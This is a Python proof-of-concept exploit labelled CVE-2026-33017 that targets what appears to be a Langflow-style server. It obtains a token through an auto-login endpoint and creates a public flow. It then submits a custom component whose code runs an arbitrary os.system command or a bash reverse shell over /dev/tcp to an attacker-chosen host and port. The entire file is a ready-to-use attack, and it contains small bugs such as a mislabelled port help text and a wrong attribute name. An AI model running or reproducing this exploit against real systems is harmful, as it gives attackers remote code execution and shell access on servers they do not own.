import requests import argparse import sys def create_flow(host, port, timeout=5): if not host.startswith(("http://", "https://")): base_url = f"http://{host}:{port}" else: base_url = f"{host}:{port}" session = requests.Session() print("[*] Fetching access token...") login_res = session.get(f"{base_url}/api/v1/auto_login", timeout=timeout) if not login_res.ok: print(f"[!] Failed to login. Server returned: {login_res.text}") login_res.raise_for_status() token = login_res.json().get("access_token") session.headers.update({ "Authorization": f"Bearer {token}", "Content-Type": "application/json" }) print("[*] Creating a new public flow...") flow_payload = { "name": "test", "data": {"nodes": [], "edges": []}, "access_type": "PUBLIC" } flow_res = session.post(f"{base_url}/api/v1/flows/", json=flow_payload, timeout=timeout) if not flow_res.ok: print(f"[!] Failed to create flow. Server returned: {flow_res.text}") flow_res.raise_for_status() flow_id = flow_res.json().get("id") print(f"[+] Public Flow ID created: {flow_id}") return flow_id def run_reverse_shell(host, port, lhost, lport, flow_id, timeout=5): print(f"[*] Sending reverse shell to connect back to {lhost}:{lport}") command = f"import os, socket, json as _json\n\n_command = os.system(\"bash -c 'bash >& /dev/tcp/{lhost}/{lport} 0>&1'\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={{}})" success = exploit(host, port, flow_id, command, timeout) if success: print("[+] Reverse shell command sent. Check your listener.") else: print("[!] Failed to send reverse shell command.") return success def exploit(host, port, flow_id, command, timeout=5): if not host.startswith(("http://", "https://")): base_url = f"http://{host}:{port}" else: base_url = f"{host}:{port}" session = requests.Session() try: build_url = f"{base_url}/api/v1/build_public_tmp/{flow_id}/flow" exploit_payload = { "data": { "nodes": [{ "id": "Test", "type": "genericNode", "position": {"x": 0, "y": 0}, "data": { "id": "Test", "type": "Test", "node": { "template": { "code": { "type": "code", "required": True, "show": True, "multiline": True, "value": f"{command}", "name": "code", "password": False, "advanced": False, "dynamic": False }, "_type": "Component" }, "description": "X", "base_classes": ["Data"], "display_name": "Test", "name": "Test", "frozen": False, "outputs": [{ "types": ["Data"], "selected": "Data", "name": "o", "display_name": "O", "method": "r", "value": "__UNDEFINED__", "cache": True, "allows_loop": False, "tool_mode": False, "hidden": None, "required_inputs": None, "group_outputs": False }], "field_order": ["code"], "beta": False, "edited": False } } }], "edges": [] }, "inputs": None } response = session.post(build_url, json=exploit_payload, cookies={"client_id": "test"}, timeout=timeout) print(f"[*] Status Code: {response.status_code}") print("[*] Response Body:") print(response.text) return True except Exception as e: print(f"[!] An unexpected error occurred: {e}") return False def main(): parser = argparse.ArgumentParser(description="PoC for CVE-2026-33017") parser.add_argument("host", nargs="?", help="Target IP or hostname (ignored if -u is used)") parser.add_argument("-p", "--port", type=int, default=7860, help="SSH port (default: 22)") parser.add_argument("-id", "--flow_id", help="Public Flow ID (a new one will be created if omitted)") parser.add_argument("--command","-c", help="Custom command to run on target") parser.add_argument("--shell", action="store_true", help="Launch a Bash-based reverse shell") parser.add_argument("--lhost", help="Your IP for reverse shell") parser.add_argument("--lport", type=int, default=4444, help="Your port for reverse shell (default: 4444)") parser.add_argument("-t", "--timeout", type=int, default=5, help="Connection timeout (default: 5s)") args = parser.parse_args() results = [] def process_host(host): port = args.port output_lines = [] timeout = args.timeout print(f"[*] Target: {host}:{port}") if not args.shell and not args.command: msg = f"[-] No action specified for {host}:{port}. Use --shell or --command." print(msg) output_lines.append(msg) return 1, output_lines if args.shell and not args.lhost: msg = f"[-] --lhost is required for reverse shell. Skipping {host}:{port}." print(msg) output_lines.append(msg) return 1, output_lines if args.flow_id: flow_id = args.id else: flow_id = create_flow(host, port, timeout) if args.shell: success = run_reverse_shell(host, port, args.lhost, args.lport, flow_id, timeout) return (0 if success else 1), output_lines if args.command: command = f"import os, socket, json as _json\n\n_command = os.system(\"{args.command}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={{}})" success = exploit(host, port, flow_id, command) return (0 if success else 1), output_lines exit_code = 0 if not args.host: print("[-] No host specified.") return 1 code, output_lines = process_host(args.host) results.extend(output_lines) if code != 0: exit_code = code return exit_code if __name__ == "__main__": sys.exit(main())